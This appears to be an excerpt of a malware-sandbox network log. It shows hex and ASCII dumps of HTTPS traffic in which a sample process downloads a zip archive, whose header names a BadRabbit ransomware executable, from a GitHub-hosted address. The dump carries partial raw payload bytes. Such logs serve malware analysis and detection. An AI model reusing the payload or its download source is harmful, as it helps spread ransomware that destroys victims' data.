                                                                                                                                                            2022-09-29 12:44:58 UTC4000INData Raw: a0 65 ae 1f 8e da 70 24 61 b8 7f d4 a7 65 2b e8 00 76 75 02 3e c7 24 b1 3e 2e 86 13 c6 27 4e ca 57 bc 6b c9 6f e7 6f 0b 5d e9 b5 06 c2 4d 31 6a a1 85 4b 31 7f 00 27 ec 30 69 16 92 3b dd 26 b0 d2 9a 37 11 85 82 2c 4c 3d 52 00 00 24 48 a8 df f6 39 47 5c 7c f6 14 ea da c1 45 fa 09 57 53 0d 93 20 81 63 92 68 5d 78 6d 08 81 00 ef 87 3a bf eb a6 94 20 d2 04 8c 12 a2 8f ee a7 0c 80 1c 38 33 97 c5 c2 37 d3 88 34 1c 43 81 56 76 97 6e 46 e7 02 03 18 1b 5b 02 ec 75 92 82 8c ba 5e 91 a7 b7 4b 2e ae 84 9b b2 c5 7e b0 cd 1f e1 a1 98 69 1c 47 b9 70 4e ef a8 5b 84 fb fc 30 17 3d 95 5e 72 4c 59 32 1f 26 50 41 4f 62 8a ab db 28 94 72 28 87 9d 6d 73 b9 5c a7 fc d8 ba a8 33 bb 53 18 3d 5d 80 91 7e 91 3a 62 a5 ca d0 89 92 7e fa 7d e7 be e0 43 8e 1c 41 a3 f9 4f 80 6c cd 9b da
                                                                                                                                                            Data Ascii: ep$ae+vu>$>.'NWkoo]M1jK1'0i;&7,L=R$H9G\|EWS ch]xm: 8374CVvnF[u^K.~iGpN[0=^rLY2&PAOb(r(ms\3S=]~:b~}CAOl
                                                                                                                                                            2022-09-29 12:44:58 UTC4001INData Raw: e2 2b 94 38 7c 73 9d 10 17 69 09 fc c0 91 07 1b 70 8e f9 3a 5e 3c 29 20 37 0c e5 26 70 31 9a 4f 96 b0 33 e9 8b cf b2 4d b9 23 2b 77 ed 3f b9 14 7d 27 4c 53 61 95 68 96 30 23 b7 18 ef 90 55 7e fc 57 d2 7e 60 60 25 3c 2a 08 c5 8e 3f 7e 11 2b 43 77 28 78 b2 c6 b7 19 99 c0 59 4e de ce 8d 82 2b 3f 92 ec c8 f8 f5 96 af f8 f9 00 5c 6d b5 96 2e ce 26 29 24 e9 c1 6b 69 d1 5a 41 70 21 cb f5 44 46 a3 ac 81 30 26 8e a8 75 cb 02 c6 f8 51 0e 7b 17 39 55 d8 4b ed 1c 26 ec 2f be 87 4b 55 89 27 a6 9f 5e 1c 10 52 b0 77 d9 6b 80 96 29 13 00 79 48 57 4e 6b 13 63 43 a4 2e c2 31 c7 23 09 cd 05 cb 55 31 c7 a2 c7 8e b9 ba 1d 86 a2 5d 43 4e a7 d8 e0 d6 d1 2a 36 73 cc 42 aa e6 e7 78 55 bc bf ca 0b 76 a9 e8 89 1b 83 9f de 36 10 2b 57 55 08 46 87 d4 b3 a9 7f a9 67 68 a1 4f 33 a7 ed
                                                                                                                                                            Data Ascii: +8|sip:^<) 7&p1O3M#+w?}'LSah0#U~W~``%<*?~+Cw(xYN+?\m.&)$kiZAp!DF0&uQ{9UK&/KU'^Rwk)yHWNkcC.1#U1]CN*6sBxUv6+WUFghO3
                                                                                                                                                            2022-09-29 12:44:58 UTC4002INData Raw: 5a 58 c2 37 e0 5d 4c 0f 17 ae 63 58 14 e2 5a 5f 1d 65 a3 0a 0c 42 a1 c8 49 6f 11 b5 3f 7e 04 01 a8 50 18 7c 2a 3f 6c 7f 10 2d 90 3b bc 63 7a 87 16 e9 da 0b ce a5 2c bf 7a 90 b3 76 08 ca cf fe f3 e6 f6 4a 05 3d 97 21 cc 9a e2 da e6 81 c4 2c cb 86 ec 37 46 6a 0c 10 4a 0f 02 3d ba 80 d3 3e d0 a6 34 71 bd 6a a6 ae f5 13 b3 19 9f 00 3b bc fc ed 1f c7 75 99 25 41 5c 3a d4 98 88 dc df 1f ca d0 60 13 88 f2 bb 98 f8 5e 05 d2 4a d5 49 57 d7 c0 3e cc 72 9f 38 37 3a ce d3 ce 71 91 35 3b 59 dd 07 41 20 c7 dd 69 ef 95 eb e9 48 b5 33 46 49 d7 e8 9a b0 ed f2 b7 7e b8 b6 8d b2 38 ca fd 04 a3 88 38 e4 b2 11 aa 95 a9 e3 ca 38 5d 35 41 fd e8 a0 18 e3 41 7a 0f f8 b1 e1 44 b9 3a 42 96 26 49 6c e6 c8 4b fd 5c 1a 2a ec 9a d3 04 cb fd 44 42 51 75 42 d1 07 26 d0 ce c7 3e 03 cd f7
                                                                                                                                                            Data Ascii: ZX7]LcXZ_eBIo?~P|*?l-;cz,zvJ=!,7FjJ=>4qj;u%A\:`^JIW>r87:q5;YA iH3FI~888]5AAzD:B&IlK\*DBQuB&>
                                                                                                                                                            2022-09-29 12:44:58 UTC4004INData Raw: 30 68 d1 4d 94 cc 33 41 8c 0a 6d 02 99 c1 b0 2e 8a 54 3c f5 68 86 59 9d a8 0b c5 d9 ad ce d8 c4 b4 f2 be b4 51 db 07 54 6a 90 a0 fe 3f f5 f3 6f e8 41 3b a7 ec ea 7d 54 86 bc 84 75 9e 24 a7 62 f8 ac c6 20 9b 86 5e 1d 35 4d 47 d7 7b f9 ca d1 ef 02 d0 22 d6 d1 1e 2c 91 8a 1b 49 52 ae cf 01 77 9b e4 26 b2 81 de 27 c1 6e 91 e6 2e 19 e9 5e 2c c2 94 6a a8 a2 a8 16 26 a9 da 2d 54 f3 95 be 76 ce a0 8d 42 ac 8f 35 5d 15 3a d7 e2 7f aa 61 3e 84 87 a7 6f ae 82 d2 f7 b3 24 e8 33 f4 22 a7 37 e5 2c 15 03 cf 3a 36 41 ac a3 1c e3 09 87 3a 2a 69 c9 29 6d d4 47 ab 0b fe dd 2d 01 dd f2 35 20 e6 d7 f3 f9 c6 87 b4 4c 82 67 59 c8 08 e5 ce 05 6a 2e 0f bc 4a 51 07 78 58 3c 7f c2 99 1f 84 3d 81 92 1c 19 67 86 18 14 ab 67 83 36 28 e9 3a 7e 16 4f a7 c4 6c 3a ea d8 e9 f3 07 98 2f c0
                                                                                                                                                            Data Ascii: 0hM3Am.T<hYQTj?oA;}Tu$b ^5MG{",IRw&'n.^,j&-TvB5]:a>o$3"7,:6A:*i)mG-5 LgYj.JQxX<=gg6(:~Ol:/
                                                                                                                                                            2022-09-29 12:44:58 UTC4004INData Raw: f3 7d f7 ca 32 ea 27 d2 bc 1e e4 9c ab 11 4a c7 57 d1 70 59 36 ff 67 21 93 81 d6 7a b6 03 15 bb 16 43 bb de 04 21 de 05 49 24 df d7 f7 c5 f3 73 0b b1 5e 57 76 7b e4 48 0a ec 53 18 24 51 09 ea b5 71 b0 7e 7e d9 74 7f 0c 74 45 11 87 de 68 d2 45 1a dd 9c 76 74 35 4c ad 89 ca a8 de cc a6 75 e5 3a 05 6c c9 67 7a 76 a6 83 17 89 c5 32 62 ad b6 c5 d5 3a c8 96 2c 45 c5 b6 29 98 8a 06 35 c9 4d c9 ca ff 73 81 6e e4 5c 72 cb 1a 9c ce 22 ba ec a7 bd 92 f7 41 40 1f eb 9f d2 3f 96 88 47 91 a2 f0 4e cc 49 d4 d8 53 75 fa 70 e8 6a 94 12 f4 6e 22 8a cc 5f 54 68 62 d1 41 2d 49 59 5a ce ea 6d 60 e0 6c cf 4c d5 9f e6 09 29 fa 5c f0 38 28 79 5c ea f5 b0 9b d1 bc 39 7b 17 b8 c5 2f b1 14 c4 37 52 ab 2b 62 3b 75 d1 c5 7f 64 a5 06 36 da e2 b7 fe c1 4e 0c 6c b0 e0 d0 7a 5f 5e 02 df
                                                                                                                                                            Data Ascii: }2'JWpY6g!zC!I$s^Wv{HS$Qq~~ttEhEvt5Lu:lgzv2b:,E)5Msn\r"A@?GNISupjn"_ThbA-IYZm`lL)\8(y\9{/7R+b;ud6Nlz_^
                                                                                                                                                            2022-09-29 12:44:58 UTC4020INData Raw: 4a d7 c6 57 03 d1 c3 93 8a f2 87 7f 02 7b c5 69 70 91 47 c3 d2 ba 5a 14 88 0c 97 61 07 a8 b9 46 fb 52 bb 40 05 8e 68 68 5e 6c 0b f2 f3 6c 76 9b 96 41 76 39 05 c1 ef 73 09 52 57 7e 2d 9e bf 8f 6e 5a 18 1e d1 47 d6 0b 18 3c d6 6c 8d 78 94 cc 7e 78 e4 60 58 9a f2 8c d1 be ff 81 07 81 1d 64 f0 29 98 e0 bd fc c9 d3 df 2e 9e 6a 9c fb c9 86 71 31 05 6a 46 b6 b6 3f f5 72 60 ee d0 9f 15 3f c5 27 7e 69 42 22 5a f7 7e 4b 1c da 54 12 ba 2f 5d a3 ab 48 45 80 d0 2d 86 d2 08 c2 e6 20 20 8a 73 31 d6 83 bd d7 9f d2 f9 2c 3e 92 25 c6 d2 29 65 11 03 18 5e 3c ff 0d 9e 79 61 0f 81 05 50 dc 1e 0d b7 c1 80 58 3e ee 1c 41 ee b5 8a e8 e0 02 e9 dd 12 1d ed c2 cd ea fe 2c 61 6e 52 ca 26 e5 66 95 41 4a 01 7f 9c eb f7 ec 6a fa 92 b1 9c 33 16 44 72 94 42 15 25 25 a9 07 b0 04 61 da c0
                                                                                                                                                            Data Ascii: JW{ipGZaFR@hh^llvAv9sRW~-nZG<lx~x`Xd).jq1jF?r`?'~iB"Z~KT/]HE- s1,>%)e^<yaPX>A,anR&fAJj3DrB%%a
                                                                                                                                                            2022-09-29 12:44:58 UTC4036INData Raw: e6 31 12 c9 20 11 d2 1c a4 da fd 18 4b 97 f9 9f 60 e9 8e 2b 34 ac f6 df 7d 71 99 78 54 4e 4c cc 69 bb c6 49 c4 79 68 ec bc b4 d8 78 71 70 17 af 5b 72 7e 9a 54 d4 a4 4f a4 10 46 8b 30 10 5d 24 94 c7 73 f3 d1 21 11 62 5c fe a0 3a b9 82 f6 6e 49 13 f7 84 d4 76 30 90 00 89 30 31 98 fb bb b1 49 2a 64 2e 90 2a e4 bb b0 50 4a f2 d3 9f e0 78 f0 91 48 79 21 86 87 8b 4e 13 eb c5 9c c1 07 26 b2 25 c7 95 1f b4 9e 6d 18 6e 73 25 56 d5 aa 29 a9 99 ef d8 40 83 86 0c aa a2 c8 63 73 c8 7f d3 b3 c3 05 2b e7 f9 55 2b af 35 44 03 39 82 49 5c 62 e4 ce 51 98 1a d4 bc 47 e2 36 2b fd 92 96 26 58 40 4d 51 67 0c 0e 7a b1 c2 64 09 37 70 96 4a 8f 61 c0 7b ae 93 24 94 7b 3a 2e ba ab 15 47 be 3d 1e 83 73 5a 8e 6a eb 41 65 5a 2c c5 08 49 57 d7 12 78 13 99 e0 d7 be 9f 60 e7 68 78 5c 3c
                                                                                                                                                            Data Ascii: 1 K`+4}qxTNLiIyhxqp[r~TOF0]$s!b\:nIv001I*d.*PJxHy!N&%mns%V)@cs+U+5D9I\bQG6+&X@MQgzd7pJa{${:.G=sZjAeZ,IWx`hx\<
                                                                                                                                                            2022-09-29 12:44:58 UTC4052INData Raw: 40 2a 79 0c 8d 3e 14 e6 14 2d 43 6b 61 ef 0d 54 ff c4 35 2d aa 7b 7f bb b0 89 d6 25 7e 52 14 8b 53 6f fa cb ed 1e c2 cf f8 39 87 dc 22 ff 9c c3 73 e6 c3 7a 25 00 95 ca a5 98 5d 45 7c f1 6e 03 d8 0e a3 52 4f 8d 9d f0 10 51 7c 1b 3f 75 23 c3 b5 53 9d 04 a1 54 14 22 c8 f2 5c 0a 85 80 2b 19 40 f6 fd 47 87 a1 dc d3 12 74 67 2d 7c 35 8a af e4 78 f4 dc 42 50 e8 7d 6a 14 63 80 20 b5 2c 0c 6c ed 6b 0e d9 72 3a bc c6 59 91 39 e4 e2 84 75 07 a4 31 93 e7 60 09 68 39 d2 c9 f6 07 f0 83 ef a4 15 f8 c0 96 88 6d 08 3d 23 e1 a0 ee 8e b3 cc 77 c5 64 5e b9 55 07 3f e4 4c 53 7a 23 99 fa 5d bc 3d 89 7c d0 7e d4 9d 49 71 a8 e2 56 86 8f 62 52 b4 45 35 da 93 74 88 86 82 fb 91 ef 9a 2d 7e 84 a1 3a 1b c6 2a ea d1 f0 8a 08 9e ff b8 f1 a6 ae 9b 6e 74 1f 97 da 38 df 5b da a2 f2 22 5c
                                                                                                                                                            Data Ascii: @*y>-CkaT5-{%~RSo9"sz%]E|nROQ|?u#ST"\+@Gtg-|5xBP}jc ,lkr:Y9u1`h9m=#wd^U?LSz#]=|~IqVbRE5t-~:*nt8["\
                                                                                                                                                            2022-09-29 12:44:58 UTC4068INData Raw: f9 ac 83 86 92 f5 d3 d4 1a 67 b2 69 16 fd 26 e4 d6 3f f0 20 f8 46 d7 75 ed e0 75 9d c6 74 d5 8d 80 73 7e 71 0a 32 6f ca dc 76 70 6d 6a f0 15 1f 50 b2 af 4e 0e 19 d8 9b be 5d a3 b0 8b 96 d4 12 60 cb f2 30 ba d4 9e c3 35 51 bb e0 af 55 f2 41 8a 11 98 a4 8c aa 38 41 36 58 f4 b9 6c 11 0e 29 dd 61 d3 77 15 03 6c c2 6a b7 d1 48 8a d4 1f 65 dc 82 6b b0 83 93 77 47 6b 76 9b d6 a5 0c ce ca c7 4a d3 c4 e2 62 b3 69 ae 48 3b 18 ed 4b 5a 85 39 34 3c ee 48 14 4a 35 ef 48 fb 61 80 91 7d bc 96 a5 66 16 9f 2e a2 ca 23 21 ec 54 e8 86 41 c1 e9 e0 8f d2 d2 0c 54 92 0a 40 8c 3d 62 27 b2 33 bc 7f 57 6a 51 89 09 c9 5c 19 11 f0 e2 20 66 36 cb 9e 34 17 35 cc 7d 19 78 f0 91 79 df 91 dc cc 59 51 a6 b4 a9 12 2e ba 73 05 e6 23 2f ac 1b 18 f2 ac ce 51 e3 f1 63 fa a8 bb b1 b2 6f f7 f9
                                                                                                                                                            Data Ascii: gi&? Fuuts~q2ovpmjPN]`05QUA8A6Xl)awljHekwGkvJbiH;KZ94<HJ5Ha}f.#!TAT@=b'3WjQ\ f645}xyYQ.s#/Qco
                                                                                                                                                            2022-09-29 12:44:58 UTC4084INData Raw: 7d 78 b7 97 32 c4 37 22 27 06 d3 98 c3 b8 93 ad 01 94 c7 2b 29 8a 09 db 95 c4 24 c4 60 ec 2a 33 af c3 4b 86 55 6c 3f 37 0a 0f 1f 12 06 9e e8 ed 7a 8a ec fb bc 72 f7 f9 c4 b0 86 cf 3f f9 6c 0f 72 f6 ab 6a a0 7a 3b 08 d4 38 77 5e 78 ec 3a 13 1e c7 59 be 38 65 d3 04 d6 52 ed 54 99 8b 83 7f ee 80 4f 4c 90 b1 40 b4 cc 81 22 15 dd 5e 28 c6 aa a7 eb e0 de 4a 99 b8 bd 98 f3 43 5c 28 25 ff 52 5d 07 e3 0d 5e 9c 94 72 96 65 3a 81 1a 41 62 93 f1 e2 f0 80 f8 b0 6a d5 dc 27 9e 81 61 87 4a 73 54 96 e3 2f 02 a7 54 da e3 ab 00 ad 3a 0b 9c 01 7f 51 b0 05 72 d2 a0 cc 33 bc c7 81 10 cd 6e 10 e8 de ea 44 30 e0 5c 3c 91 77 9c 21 02 85 1f 14 63 c3 19 3b ce cb b3 1c 81 de a0 2f 31 b9 71 ba 26 d8 ef 8d 47 de 45 e4 e0 3a c2 41 d3 1c 79 e6 3e 0c 32 99 e9 1c b1 5f 3a b6 e3 66 4a c9
                                                                                                                                                            Data Ascii: }x27"'+)$`*3KUl?7zr?lrjz;8w^x:Y8eRTOL@"^(JC\(%R]^re:Abj'aJsT/T:Qr3nD0\<w!c;/1q&GE:Ay>2_:fJ
                                                                                                                                                            2022-09-29 12:44:58 UTC4100INData Raw: c4 18 90 c9 dc 7c 8c f4 20 19 89 9e a7 9b a6 53 4e d3 c3 bf 56 a3 92 a6 35 69 33 0f ff 81 ce 4b 35 7d f3 16 24 a7 f9 a2 6e 8b 60 1c 36 29 4e 9e 41 de cd 52 23 8e db 80 12 ec 62 bd d7 f6 35 fa f2 89 69 e1 c8 77 30 3f dc 12 43 b1 3b 35 9c 73 08 d5 16 3f f7 46 41 53 0c 3c 93 98 f9 42 02 fc e1 61 9e 1e 10 7b 1e b7 db 4b 6f e5 65 d6 2a c1 6e 66 c8 81 a2 fe 59 da de 46 f9 16 f3 e2 78 72 74 81 dd 9e 69 3b 36 9f da b3 48 9d 14 21 65 b1 75 82 bc 09 ff d9 db 48 9e 27 fc 73 97 cc a8 51 13 1a e5 de ae c7 bf 59 29 87 c2 4c 6b 22 a8 3f f1 51 3e 59 f2 b5 f9 c7 62 dc 94 6a 8a da f3 7c 52 78 ee 84 14 bb d0 92 d3 04 f0 b3 51 fb cd e9 ac 10 36 9a 25 eb 2d 91 ca 82 c8 e9 df 8f f1 5c 17 e8 9b 3c 0d 07 b1 ba 28 91 23 87 8f b8 90 74 06 81 fb 99 0c 9e d9 c5 12 86 06 c9 3c 27 48
                                                                                                                                                            Data Ascii: | SNV5i3K5}$n`6)NAR#b5iw0?C;5s?FAS<Ba{Koe*nfYFxrti;6H!euH'sQY)Lk"?Q>Ybj|RxQ6%-\<(#t<'H
                                                                                                                                                            2022-09-29 12:44:58 UTC4116INData Raw: 4a 03 ad 3d db 62 96 de 80 a6 2e ad 54 6e a9 18 f6 d4 e7 58 c3 a9 25 08 04 f3 23 81 57 6f 8d 15 4b 0d 00 03 38 79 b2 79 64 c8 bb 62 88 2f 18 a5 a1 9c b2 24 b3 08 82 e4 7d 27 2b eb e6 d2 e5 17 fb 47 59 d4 97 b6 5a 8b f1 e1 82 d4 03 01 46 26 a7 f5 8c 8f c7 7e e2 69 72 e8 0f 67 f3 d5 03 8b ab 2b ca 14 75 92 c6 a1 9c ad 09 5a 7d fa 4c 20 aa 36 39 83 76 05 7f 20 b0 b4 46 cd ad 04 62 7b 5c ed 8d 2d 0a af 00 71 cc 7f ca e4 75 cf e2 c1 13 ee 11 0a 6a 5f bf f7 22 d1 b7 df 85 91 4e a1 3b 69 3d 6d 57 95 67 aa 3a 33 da ad 0d f2 de d6 1a 99 ab 5d d3 73 18 e0 f1 3d 5f 09 5c 11 fd eb fa fa 1b 79 c3 2f 8c 02 51 5f 92 4e b2 71 e0 0e e3 55 24 41 ae 04 c2 3f fa cc d4 eb 9c c2 dd 22 50 b9 e2 c1 f3 7e e1 49 d0 1a c3 94 dc 8d 83 cf 24 09 b5 ae 7e 99 91 10 6d a5 ac b3 bf a5 cf
                                                                                                                                                            Data Ascii: J=b.TnX%#WoK8yydb/$}'+GYZF&~irg+uZ}L 69v Fb{\-quj_"N;i=mWg:3]s=_\y/Q_NqU$A?"P~I$~m


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5185.199.110.133443192.168.2.649710C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:42 UTC4INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 402632
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "004f09a50a54351833511d1b99db3436b26a72d8e149d6c13dd20a27fe83f3a9"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 081E:1220:100920B:1104BA2:633592FF
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:42 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6953-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455483.772553,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 38af208a0e014b9fee9bd2da4761fcd8bb1b175f
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:42 GMT
                                                                                                                                                            Source-Age: 59
                                                                                                                                                            2022-09-29 12:44:42 UTC4INData Raw: 50 4b 03 04 14 00 01 00 08 00 81 a9 58 4b a5 c9 a1 5f 12 24 06 00 2b be 06 00 18 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 42 61 64 52 61 62 62 69 74 2e 65 78 65 01 be e1 49 53 97 20 1c fa c3 6c 18 29 d1 f4 f7 b9 c1 0f c2 9d 6d e2 a3 7f 5f 80 37 a1 bf 46 53 1e 79 43 c5 68 f0 2d 6f a5 6c bc 0b d3 34 e8 37 46 4f 1d 09 b7 a5 d6 3f 8f 58 ab 3e 2a 6b e8 1c 51 80 2f 2b 06 5f 55 e5 78 40 db b9 ba f4 53 46 d8 d7 32 07 89 19 21 37 5e 46 a7 76 3d 2e 65 bc d2 d4 da f9 17 a2 91 f7 2a 17 53 56 14 07 fc 80 61 6e be 20 45 b9 a6 61 66 fa 0e e1 ab 52 4b 8f 7a 5f 56 4d 81 a4 45 ec fb 8c c3 9b b1 0c 2c 9f ac be 4e 92 81 00 98 1f 9a 78 44 7b 7e 07 bf be 1f 74 1e c3 72 cc ca b4 be 8c f1 ec 6f e7 14 34 c2 be ff d4 80 dc 69 5f 70 f5 e0 9e cf 53 02 80 3a 32 88 09 e4 9a 07 df 28
                                                                                                                                                            Data Ascii: PKXK_$+Endermanch@BadRabbit.exeIS l)m_7FSyCh-ol47FO?X>*kQ/+_Ux@SF2!7^Fv=.e*SVan EafRKz_VME,NxD{~tro4i_pS:2(
                                                                                                                                                            2022-09-29 12:44:42 UTC6INData Raw: 34 32 65 b6 94 d6 82 b7 43 9e 4a 02 54 b5 35 79 77 8c f9 07 93 82 0a ea 8d ad c0 11 a4 0f c9 18 4d 97 d4 2b 21 fd 14 21 23 bb c3 75 54 09 b7 42 ea 85 01 a0 3e 79 a2 2a 6c 74 b8 19 55 58 7c 91 1c 9a 4b 1f bf c4 2c 5b 94 30 25 67 ea 17 e7 9e b7 9e 75 c0 e0 37 ec f1 7d 83 c9 2a 70 84 d9 f2 17 cd 1b 65 77 e8 15 a9 d6 30 27 03 62 99 43 e8 af e6 f3 37 3b bf 96 93 3e 56 12 2d ad 6a 24 17 4a 24 21 8c 72 90 22 84 ea 46 f9 7f d3 a4 2d 8a 96 aa f4 3b 8b d5 b9 52 93 63 91 ac 36 dd 22 be 4c bd 29 5a d5 f9 9c f2 54 df 96 38 c2 7a 8a a0 2a 54 3e bb 6b 33 fd d0 1a 52 f0 28 20 be 11 ea bd 23 a1 52 46 63 49 47 4c 46 fb 28 cd 1b 46 87 0a c7 dc 90 a8 f1 9d 8a b3 06 02 f8 29 7d 38 1a 36 15 ca 59 e4 4e aa 01 82 e1 63 5c 45 df 81 8e 9c d7 9b bd 14 cf e2 17 1d 97 e1 9b 99 0a c9
                                                                                                                                                            Data Ascii: 42eCJT5ywM+!!#uTB>y*ltUX|K,[0%gu7}*pew0'bC7;>V-j$J$!r"F-;Rc6"L)ZT8z*T>k3R( #RFcIGLF(F)}86YNc\E
                                                                                                                                                            2022-09-29 12:44:42 UTC7INData Raw: 0b 4e ef f3 6f de 93 7d a5 05 18 9d 45 49 ba f1 95 0a fe e5 1d 2c 3d 8d 9f b6 af 61 be ce 82 20 42 80 de 04 34 af 26 76 84 d9 b0 cd f2 ef 7d dc a0 96 8b e3 64 a3 16 dc d4 c2 dc e9 ab b5 55 06 32 cb 4f f0 b4 5e 63 02 ef 09 6a 9e 96 33 60 33 fe 8c 2a bc 38 61 c9 78 94 53 07 08 47 c4 fa e8 e7 33 bb dd 26 2e f2 f0 de ea d4 a8 f2 f4 b0 0e ed 58 b1 cb a3 dd 1c 2f 51 36 d5 9a db 7a bf 9c 05 95 0a d7 98 b5 6d 98 39 11 bc 35 fb 73 2a 8b 65 75 c1 c8 3a 5d f9 e7 53 79 08 72 37 05 31 50 43 96 46 b9 84 fb 94 4c cb 59 bc ad a5 4d a9 d2 ff fe c9 5c b4 de 43 1f c9 8b 9b d6 95 3a eb f1 c6 ea 6c 5f 18 ee 12 3d 01 e2 ec f1 db ca 1b 3d 5e b4 9e c5 a5 b2 0e 85 46 13 d9 7a 88 59 bd 6d cc fd 87 63 e7 b7 26 93 d5 62 61 25 0e 88 c4 97 f9 43 93 cb 88 94 d0 ad 67 9c 3c 40 b5 cc 8c
                                                                                                                                                            Data Ascii: No}EI,=a B4&v}dU2O^cj3`3*8axSG3&.X/Q6zm95s*eu:]Syr71PCFLYM\C:l_==^FzYmc&ba%Cg<@
                                                                                                                                                            2022-09-29 12:44:42 UTC8INData Raw: 8c 37 76 69 b4 a5 3e 45 27 e1 53 fb 7b 37 7b bc 8c 6b ab 81 72 b2 d9 c2 3e ea 9f 06 6d cb 02 98 fd c5 2f e6 6b 2c 3e 04 fd 0e a2 13 dc 90 47 67 94 9a 05 6a e2 72 51 6f 79 20 c0 af 9c b6 cd 7e 06 8b 75 f7 f4 5f 72 0e ce b1 55 7e ef e3 99 00 cd d7 da 5d fa 58 4d 5f 79 5b 28 fc 62 1c ae 59 81 43 d0 34 f7 eb e8 eb 32 6c 5e 27 c4 1c ec 02 9c 5d 5a 10 ac c5 8b e3 c2 79 46 de 52 af 04 f8 55 49 89 7e 4b 54 68 e0 6c b3 ac e5 2f c5 fd e2 ec 8d 51 c6 27 e4 30 fe cf 43 87 d9 ac c5 af da 94 77 e6 02 27 5c 83 72 37 b1 af a6 c4 fc 2b 13 dd 23 6b 9a 8d e2 a7 35 9c e2 05 29 79 32 af ba c8 bb b3 8c 60 1f 67 0c 24 c1 75 78 c6 4b 6e 11 4d ab 81 20 38 bd 91 9a fe c7 b9 bb 4a e2 be f0 aa 04 46 61 a9 e8 71 b6 b1 20 b9 a9 3c f3 51 26 1b 5c b0 ee 94 ff 86 61 b9 1d 6c 1b 50 cb 6f
                                                                                                                                                            Data Ascii: 7vi>E'S{7{kr>m/k,>GgjrQoy ~u_rU~]XM_y[(bYC42l^']ZyFRUI~KThl/Q'0Cw'\r7+#k5)y2`g$uxKnM 8JFaq <Q&\alPo
                                                                                                                                                            2022-09-29 12:44:42 UTC10INData Raw: c1 16 b7 77 97 48 37 28 7a 7b d4 b9 6c c7 17 29 0c 64 76 e8 86 67 1b f2 0e 51 87 a1 b3 07 5a 7b d8 66 cf f5 9a 3c ee 5e 88 07 bf ab 11 17 56 af 41 fa cb e8 fd d3 67 2f 42 83 dc 48 c4 a3 e7 22 d8 94 07 a7 7b 82 18 9e a6 f4 9c 28 2e f6 c1 7b b4 4c 21 da 36 7e 55 de 0b bd 81 0f 22 ad b2 fb 83 1b 3d 13 18 e1 f4 93 25 51 71 61 38 cc 76 6f d4 02 e5 75 59 61 b9 0f cb 08 d6 b9 c4 a5 69 83 80 51 fe b9 dd 2e 06 b5 3b af 1e be 76 e4 e6 ca df 7f 59 5f d4 ea 9d 7a cc d7 40 c8 65 73 e6 62 c8 7a 26 98 7d 22 ec 19 8f e2 bb cb d6 2c c7 69 66 a8 dd eb 4a 81 8f 13 8a ce 05 37 02 a4 27 de a9 3f 24 41 39 93 f5 e8 aa b0 82 82 e3 4d 39 23 54 01 a3 b8 14 ee 64 b4 47 fa 13 fc 5d da e7 b7 59 0e 5b 26 9c fd 12 0d 9c 49 08 f2 f6 5d 75 96 da 33 49 c4 58 47 e6 a7 92 96 08 4e 79 4e 04
                                                                                                                                                            Data Ascii: wH7(z{l)dvgQZ{f<^VAg/BH"{(.{L!6~U"=%Qqa8vouYaiQ.;vY_z@esbz&}",ifJ7'?$A9M9#TdG]Y[&I]u3IXGNyN
                                                                                                                                                            2022-09-29 12:44:42 UTC11INData Raw: 8b 07 5d 36 1d d5 87 3c 81 4d 8c 76 b4 d1 e6 fe aa 29 36 9b 5f 71 06 5c 95 d2 f1 29 d5 a3 57 eb cd 49 62 2b c8 bb 99 6f 11 f6 1c d8 c2 f0 5c 92 d4 79 70 43 ec 43 f1 1d 25 95 ee bc d8 d1 d0 62 34 d8 f3 03 91 a1 a8 28 43 dc aa 4c f2 88 9b cd ab fc c0 14 11 24 fd 32 33 f8 01 63 62 4b c1 dd ce 23 a7 84 9e 2c 6f db 41 43 cd 7c f5 43 9a 2b 49 29 72 df 5e 61 23 ca ab a6 04 f7 ab e5 2c fc 65 95 dd 78 ec 7d 25 c0 7e d4 16 50 79 3f 70 20 fb 66 92 72 95 ed 50 93 11 14 d8 c7 a0 ba 34 f0 38 2d 7a 5c d3 55 05 a5 74 f0 73 2a 08 1d 18 8c 8c 56 8d 98 41 a0 e8 9a 20 e9 f0 4b 34 3d d5 77 6a d2 95 7b 93 f8 37 46 5c a9 87 78 7c f1 64 9c d9 0e c3 c1 27 43 27 63 16 f1 03 bd e9 4b 17 69 56 12 9b 05 70 e8 62 80 66 23 f1 a1 7f d6 85 92 1c b5 d5 42 03 aa 02 96 41 16 3b e2 bd 96 fc
                                                                                                                                                            Data Ascii: ]6<Mv)6_q\)WIb+o\ypCC%b4(CL$23cbK#,oAC|C+I)r^a#,ex}%~Py?p frP48-z\Uts*VA K4=wj{7F\x|d'C'cKiVpbf#BA;
